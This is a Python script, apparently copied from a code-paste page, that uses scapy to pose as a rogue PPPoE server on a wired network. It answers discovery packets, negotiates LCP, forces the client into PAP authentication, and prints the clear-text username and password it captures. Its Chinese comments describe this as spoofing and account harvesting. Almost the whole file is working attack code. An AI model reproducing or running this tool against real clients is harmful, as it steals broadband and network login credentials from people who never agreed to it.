# coding:utf-8'''@author Karblue@date 2016年2月27日'''import structimport u

1. # coding:utf-8
2.  
3. '''
4. @author Karblue
5. @date 2016年2月27日
6. '''
7.  
8. import struct
9. import uuid
10. import copy
11.  
12. import scapy.all as scapy
13. from scapy.layers.ppp import *
14. from psutil import net_if_addrs
15.  
16. MAC_ADDRESS = "0a:0a:0a:0a:0a:0a"
17.  
18.  
19. # 不适用于多网卡
20. def get_mac_address():
21. # mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
22. # return ":".join([mac[e:e + 2] for e in range(0, 11, 2)])
23. addrs = []
24. for k, v in net_if_addrs().items():
25. for item in v:
26. address = item[1]
27. if '-' in address and len(address) == 17:
28. addrs.append(address)
29. return addrs
30.  
31.  
32. class PPPoEServer(object):
33. def __init__(self):
34. self.clientMap = {}
35.  
36. # 开始监听
37. def start(self):
38. scapy.sniff(lfilter=self.filterData)
39.  
40. # 过滤pppoe数据
41. def filterData(self, raw):
42. if hasattr(raw, "type"):
43. _type2Method = {
44. # 发现阶段
45. 0x8863: {
46. "code": {
47. # PADI
48. 0x09: (self.send_pado_packet, "PADI阶段开始,发送PADO..."),
49. # PADR
50. 0x19: (self.send_pads_packet, "PADR阶段开始,发送PADS...")
51. }
52. },
53. # 会话阶段
54. 0x8864: {
55. "proto": {
56. # LCP链路处理
57. 0xc021: (self.send_lcp_req, "欺骗成功,开始处理数据..."),
58. # PAP协议处理
59. 0xc023: (self.get_papinfo, "获取账号信息...")
60. }
61. }
62. }
63. if raw.type in _type2Method:
64. _nMethod = _type2Method[raw.type]
65. for k, v in _nMethod.items():
66. _nVal = getattr(raw, k)
67. if _nVal in _nMethod[k]:
68. _nObj = _nMethod[k][_nVal]
69. print(_nObj[1])
70. _nObj[0](raw)
71.  
72. # 处理lcp-req请求
73. def send_lcp_req(self, raw):
74. if raw.load[0] == "\x01":
75. print("收到LCP-Config-Req")
76. # 第一次收到req 请求,直接拒绝
77. if raw.src not in self.clientMap:
78. self.send_lcp_reject_packet(raw)
79. # self.send_lcp_reject_packet(raw)
80. self.send_lcp_req_packet(raw)
81. self.clientMap[raw.src] = {"req": 1, "ack": 0}
82.  
83. # 无论何时收到req,返回原始ack
84. self.send_lcp_ack_packet(raw)
85. print("发送LCP-Config-Ack")
86.  
87. # 解析pap账号密码
88. def get_papinfo(self, raw):
89. # pap-req
90. if raw.load[0] == "\x01":
91. _payLoad = raw.load
92. _nUserLen = struct.unpack("!B", _payLoad[4])[0]
93. _nPassLen = struct.unpack("!B", _payLoad[5 + _nUserLen])[0]
94. _userName = _payLoad[5:5 + _nUserLen]
95. _passWord = _payLoad[6 + _nUserLen:6 + _nUserLen + _nPassLen]
96. print("get User:%s,Pass:%s" % (_userName, _passWord))
97. self.send_pap_authreject(raw)
98. if raw.src in self.clientMap:
99. del self.clientMap[raw.src]
100.  
101. print("欺骗完毕....")
102.  
103. # 发送pap拒绝验证
104. def send_pap_authreject(self, raw):
105. raw.dst, raw.src = raw.src, raw.dst
106. raw.load = "\x03\x02\x00\x06\x01\x00"
107. scapy.sendp(raw)
108.  
109. # 发送lcp-config-ack回执包
110. def send_lcp_ack_packet(self, raw):
111. raw = copy.deepcopy(raw)
112. raw.dst, raw.src = raw.src, raw.dst
113. raw.load = "\x02" + raw.load[1:]
114. scapy.sendp(raw)
115.  
116. # 发送lcp-config-reject回执包
117. def send_lcp_reject_packet(self, raw):
118. raw = copy.deepcopy(raw)
119. raw.dst, raw.src = raw.src, raw.dst
120. raw.load = "\x04" + raw.load[1:]
121. scapy.sendp(raw)
122.  
123. # 发送lcp-config-req回执包
124. def send_lcp_req_packet(self, raw):
125. # 实际client payload
126. raw = copy.deepcopy(raw)
127. raw.dst, raw.src = raw.src, raw.dst
128. _rawnLoad = raw.load
129. # 插入PAP认证
130. _payload = "\x01\x04\x05\xc8\x03\x04\xc0\x23\x05\x06\x5e\x63\x0a\xb8\x00\x00\x00\x00"
131. raw.load = "\x01\x01\x00" + chr(len(_payload)) + _payload
132. scapy.sendp(raw)
133.  
134. # 发送pa*系列包格式
135. def send_pa_packet(self, raw, **kwargs):
136. raw.src, raw.dst = MAC_ADDRESS, raw.src
137. # 寻找客户端的Host_Uniq
138. _host_Uniq = self.padi_find_hostuniq(raw.load)
139. _payload = "\x01\x01\x00\x00\x01\x02\x00\x03^_^"
140. if _host_Uniq:
141. _payload += _host_Uniq
142.  
143. raw.len = len(_payload)
144. raw.load = _payload
145. for k, v in kwargs.items():
146. setattr(raw, k, v)
147.  
148. scapy.sendp(raw)
149.  
150. # 发送lcp-termination会话终止包
151. def send_lcp_end_packet(self, raw):
152. _pkt = Ether(src=raw.dst, dst=raw.src, type=0x8863) / PPPoE(version=0x1, type=0x1, code=0xA7, sessionid=0x01,
153. len=0)
154. scapy.sendp(_pkt)
155.  
156. # 发送PADS回执包
157. def send_pads_packet(self, raw):
158. return self.send_pa_packet(raw, code=0x65, sessionid=0x01)
159.  
160. # 发送PADO回执包
161. def send_pado_packet(self, raw):
162. return self.send_pa_packet(raw, code=0x07)
163.  
164. # 寻找客户端发送的Host-Uniq
165. def padi_find_hostuniq(self, raw):
166. _key = "\x01\x03"
167. if _key in raw:
168. _nIdx = raw.index(_key)
169. # 2字节host-uniq 长度
170. _nLen = struct.unpack("!H", raw[_nIdx + 2:_nIdx + 4])[0]
171. # 2字节长度+剩余字节
172. _nData = raw[_nIdx + 2:_nIdx + 4 + _nLen]
173. return _key + _nData
174.  
175. return
176.  
177.  
178. if __name__ == "__main__":
179. print(get_mac_address())
180. macs = get_mac_address()
181. mac_dict = {}
182. i = 1
183. for mac in macs:
184. mac_dict[i] = mac
185. print('网卡%d, MAC: %s' % (i, mac))
186. i += 1
187. i = input('输入连接的有线网卡序号')
188.  
189. MAC_ADDRESS = mac_dict[int(i)]
190. print('获取到网卡:', MAC_ADDRESS)
191. print('等待pppoe客户端连接...')
192. n = PPPoEServer()
193. n.start()